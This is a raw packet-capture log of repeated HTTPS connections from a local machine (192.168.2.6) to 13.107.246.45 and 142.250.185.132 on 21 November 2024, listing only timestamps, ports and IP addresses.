Nov 21, 2024 09:54:47.102715015 CET	443	49907	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:47.105559111 CET	49910	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:47.105607033 CET	443	49910	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:47.105699062 CET	49910	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:47.105856895 CET	49910	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:47.105870962 CET	443	49910	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:47.125093937 CET	443	49906	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:47.128814936 CET	443	49906	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:47.128896952 CET	49906	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:47.128945112 CET	49906	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:47.128945112 CET	49906	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:47.128966093 CET	443	49906	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:47.128976107 CET	443	49906	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:47.131449938 CET	49911	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:47.131508112 CET	443	49911	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:47.131582975 CET	49911	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:47.131721020 CET	49911	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:47.131738901 CET	443	49911	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:47.768148899 CET	443	49908	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:47.768661022 CET	49908	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:47.768676043 CET	443	49908	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:47.769117117 CET	49908	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:47.769121885 CET	443	49908	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:48.223623991 CET	443	49908	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:48.226608992 CET	443	49908	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:48.226667881 CET	49908	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:48.226716995 CET	49908	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:48.226737022 CET	443	49908	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:48.226748943 CET	49908	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:48.226754904 CET	443	49908	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:48.229391098 CET	49912	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:48.229450941 CET	443	49912	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:48.229577065 CET	49912	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:48.229799986 CET	49912	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:48.229819059 CET	443	49912	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:48.797708035 CET	443	49909	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:48.798295021 CET	49909	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:48.798352003 CET	443	49909	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:48.798713923 CET	49909	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:48.798721075 CET	443	49909	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:48.886104107 CET	443	49910	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:48.886617899 CET	49910	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:48.886635065 CET	443	49910	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:48.887007952 CET	49910	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:48.887015104 CET	443	49910	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:48.913084984 CET	443	49911	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:48.913620949 CET	49911	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:48.913671970 CET	443	49911	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:48.914222956 CET	49911	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:48.914237976 CET	443	49911	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:49.239552021 CET	443	49909	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:49.243138075 CET	443	49909	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:49.243211031 CET	49909	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:49.243287086 CET	49909	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:49.243330002 CET	443	49909	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:49.243351936 CET	49909	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:49.243360043 CET	443	49909	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:49.245894909 CET	49913	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:49.245950937 CET	443	49913	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:49.246210098 CET	49913	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:49.246251106 CET	49913	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:49.246260881 CET	443	49913	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:49.330569029 CET	443	49910	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:49.333703041 CET	443	49910	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:49.333813906 CET	49910	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:49.333863020 CET	49910	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:49.333863020 CET	49910	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:49.333885908 CET	443	49910	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:49.333895922 CET	443	49910	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:49.336294889 CET	49914	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:49.336405039 CET	443	49914	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:49.336499929 CET	49914	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:49.336620092 CET	49914	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:49.336642027 CET	443	49914	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:49.357459068 CET	443	49911	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:49.357708931 CET	443	49911	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:49.357892990 CET	49911	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:49.357956886 CET	49911	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:49.357986927 CET	443	49911	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:49.358004093 CET	49911	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:49.358011007 CET	443	49911	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:49.360414982 CET	49915	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:49.360466957 CET	443	49915	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:49.360599995 CET	49915	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:49.360716105 CET	49915	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:49.360737085 CET	443	49915	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:49.945242882 CET	443	49912	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:49.945919037 CET	49912	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:49.946007967 CET	443	49912	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:49.946584940 CET	49912	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:49.946600914 CET	443	49912	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:50.379676104 CET	443	49912	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:50.382740974 CET	443	49912	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:50.382849932 CET	49912	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:50.382849932 CET	49912	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:50.383174896 CET	49912	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:50.383208990 CET	443	49912	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:50.385673046 CET	49916	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:50.385720968 CET	443	49916	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:50.385901928 CET	49916	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:50.385961056 CET	49916	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:50.385967016 CET	443	49916	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:51.032006979 CET	443	49913	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:51.032627106 CET	49913	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:51.032697916 CET	443	49913	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:51.033075094 CET	49913	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:51.033092022 CET	443	49913	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:51.139561892 CET	443	49915	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:51.140044928 CET	49915	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:51.140068054 CET	443	49915	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:51.140505075 CET	49915	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:51.140516043 CET	443	49915	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:51.182146072 CET	443	49914	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:51.182666063 CET	49914	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:51.182706118 CET	443	49914	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:51.183223009 CET	49914	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:51.183238029 CET	443	49914	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:51.476022959 CET	443	49913	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:51.479193926 CET	443	49913	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:51.479254961 CET	49913	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:51.479279995 CET	443	49913	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:51.479370117 CET	49913	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:51.479425907 CET	49913	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:51.479470015 CET	443	49913	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:51.479496956 CET	49913	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:51.479511976 CET	443	49913	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:51.482134104 CET	49917	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:51.482194901 CET	443	49917	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:51.482261896 CET	49917	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:51.482397079 CET	49917	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:51.482414007 CET	443	49917	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:51.582370043 CET	443	49915	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:51.586117983 CET	443	49915	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:51.586241961 CET	49915	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:51.586304903 CET	49915	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:51.586323977 CET	443	49915	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:51.586355925 CET	49915	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:51.586368084 CET	443	49915	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:51.589128971 CET	49918	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:51.589190006 CET	443	49918	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:51.589318037 CET	49918	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:51.589484930 CET	49918	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:51.589503050 CET	443	49918	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:51.636746883 CET	443	49914	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:51.639745951 CET	443	49914	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:51.639823914 CET	49914	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:51.639909029 CET	49914	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:51.639909029 CET	49914	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:51.639954090 CET	443	49914	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:51.639982939 CET	443	49914	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:51.642040968 CET	49919	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:51.642074108 CET	443	49919	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:51.642146111 CET	49919	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:51.642277002 CET	49919	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:51.642287970 CET	443	49919	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:52.228374004 CET	443	49897	142.250.185.132	192.168.2.6
Nov 21, 2024 09:54:52.228549957 CET	443	49897	142.250.185.132	192.168.2.6
Nov 21, 2024 09:54:52.228621006 CET	49897	443	192.168.2.6	142.250.185.132
Nov 21, 2024 09:54:52.230727911 CET	443	49916	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:52.231292009 CET	49916	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:52.231322050 CET	443	49916	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:52.231966019 CET	49916	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:52.231972933 CET	443	49916	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:52.682466030 CET	443	49916	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:52.686104059 CET	443	49916	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:52.686166048 CET	49916	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:52.686238050 CET	49916	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:52.686263084 CET	443	49916	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:52.686283112 CET	49916	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:52.686292887 CET	443	49916	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:52.688812971 CET	49920	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:52.688853979 CET	443	49920	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:52.688988924 CET	49920	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:52.689161062 CET	49920	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:52.689176083 CET	443	49920	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:53.166270971 CET	49897	443	192.168.2.6	142.250.185.132
Nov 21, 2024 09:54:53.166290998 CET	443	49897	142.250.185.132	192.168.2.6
Nov 21, 2024 09:54:53.198054075 CET	443	49917	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:53.198470116 CET	49917	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:53.198497057 CET	443	49917	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:53.198868036 CET	49917	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:53.198873997 CET	443	49917	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:53.355928898 CET	443	49919	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:53.356307030 CET	49919	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:53.356323957 CET	443	49919	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:53.356726885 CET	49919	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:53.356731892 CET	443	49919	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:53.372836113 CET	443	49918	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:53.373123884 CET	49918	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:53.373143911 CET	443	49918	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:53.373467922 CET	49918	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:53.373472929 CET	443	49918	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:53.633145094 CET	443	49917	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:53.633208036 CET	443	49917	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:53.633277893 CET	49917	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:53.633300066 CET	443	49917	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:53.633435011 CET	49917	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:53.633446932 CET	443	49917	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:53.633465052 CET	49917	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:53.633841038 CET	443	49917	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:53.633919954 CET	443	49917	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:53.633991003 CET	49917	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:53.636059046 CET	49921	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:53.636152983 CET	443	49921	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:53.636234045 CET	49921	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:53.636375904 CET	49921	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:53.636396885 CET	443	49921	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:53.790056944 CET	443	49919	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:53.794222116 CET	443	49919	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:53.794261932 CET	49919	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:53.794270039 CET	443	49919	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:53.794287920 CET	443	49919	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:53.794337988 CET	49919	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:53.794353008 CET	443	49919	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:53.794358015 CET	49919	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:53.794363976 CET	443	49919	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:53.794377089 CET	49919	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:53.794380903 CET	443	49919	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:53.796749115 CET	49922	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:53.796786070 CET	443	49922	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:53.796904087 CET	49922	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:53.797013044 CET	49922	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:53.797019005 CET	443	49922	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:53.826008081 CET	443	49918	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:53.826025963 CET	443	49918	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:53.826056957 CET	443	49918	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:53.826076031 CET	49918	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:53.826105118 CET	49918	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:53.826265097 CET	49918	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:53.826265097 CET	49918	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:53.826287031 CET	443	49918	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:53.826303005 CET	443	49918	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:53.828246117 CET	49923	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:53.828264952 CET	443	49923	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:53.828537941 CET	49923	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:53.828537941 CET	49923	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:53.828563929 CET	443	49923	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:54.415344954 CET	443	49920	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:54.415791035 CET	49920	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:54.415806055 CET	443	49920	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:54.416281939 CET	49920	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:54.416286945 CET	443	49920	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:54.849863052 CET	443	49920	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:54.852755070 CET	443	49920	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:54.852808952 CET	49920	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:54.852853060 CET	49920	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:54.852858067 CET	443	49920	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:54.852868080 CET	49920	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:54.852871895 CET	443	49920	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:54.855640888 CET	49924	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:54.855683088 CET	443	49924	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:54.855761051 CET	49924	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:54.855917931 CET	49924	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:54.855932951 CET	443	49924	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:55.426224947 CET	443	49921	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:55.426718950 CET	49921	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:55.426805973 CET	443	49921	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:55.427159071 CET	49921	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:55.427175999 CET	443	49921	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:55.520351887 CET	443	49922	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:55.520800114 CET	49922	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:55.520816088 CET	443	49922	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:55.521143913 CET	49922	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:55.521148920 CET	443	49922	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:55.655082941 CET	443	49923	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:55.655554056 CET	49923	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:55.655589104 CET	443	49923	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:55.656163931 CET	49923	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:55.656176090 CET	443	49923	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:55.878382921 CET	443	49921	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:55.881331921 CET	443	49921	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:55.881397963 CET	49921	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:55.881432056 CET	443	49921	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:55.881465912 CET	443	49921	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:55.881541014 CET	49921	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:55.881613016 CET	443	49921	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:55.881639957 CET	49921	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:55.881639957 CET	49921	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:55.881661892 CET	443	49921	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:55.881669998 CET	443	49921	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:55.884759903 CET	49925	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:55.884816885 CET	443	49925	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:55.884969950 CET	49925	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:55.885123968 CET	49925	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:55.885135889 CET	443	49925	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:55.959712982 CET	443	49922	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:55.962898970 CET	443	49922	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:55.962955952 CET	49922	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:55.963030100 CET	49922	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:55.963030100 CET	49922	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:55.963047028 CET	443	49922	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:55.963061094 CET	443	49922	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:55.965831995 CET	49926	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:55.965867996 CET	443	49926	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:55.966026068 CET	49926	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:55.966320038 CET	49926	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:55.966331005 CET	443	49926	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:56.099415064 CET	443	49923	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:56.099431038 CET	443	49923	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:56.099490881 CET	49923	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:56.099518061 CET	443	49923	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:56.099694967 CET	49923	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:56.099694967 CET	49923	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:56.099716902 CET	443	49923	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:56.099869967 CET	443	49923	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:56.099894047 CET	443	49923	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:56.099942923 CET	49923	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:56.101862907 CET	49927	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:56.101943970 CET	443	49927	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:56.102056026 CET	49927	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:56.102164984 CET	49927	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:56.102199078 CET	443	49927	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:56.675184965 CET	443	49924	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:56.675652027 CET	49924	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:56.675663948 CET	443	49924	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:56.676084042 CET	49924	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:56.676094055 CET	443	49924	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:57.117985010 CET	443	49924	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:57.122241974 CET	443	49924	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:57.122359037 CET	443	49924	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:57.122364998 CET	49924	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:57.122376919 CET	49924	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:57.122376919 CET	49924	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:57.122414112 CET	443	49924	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:57.122488976 CET	49924	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:57.122504950 CET	443	49924	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:57.125008106 CET	49928	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:57.125073910 CET	443	49928	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:57.125207901 CET	49928	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:57.125380993 CET	49928	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:57.125411034 CET	443	49928	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:57.735966921 CET	443	49925	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:57.736898899 CET	49925	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:57.736898899 CET	49925	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:57.736974001 CET	443	49925	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:57.737018108 CET	443	49925	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:57.747360945 CET	443	49926	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:57.748152018 CET	49926	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:57.748152018 CET	49926	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:57.748167992 CET	443	49926	13.107.246.45	192.168.2.6
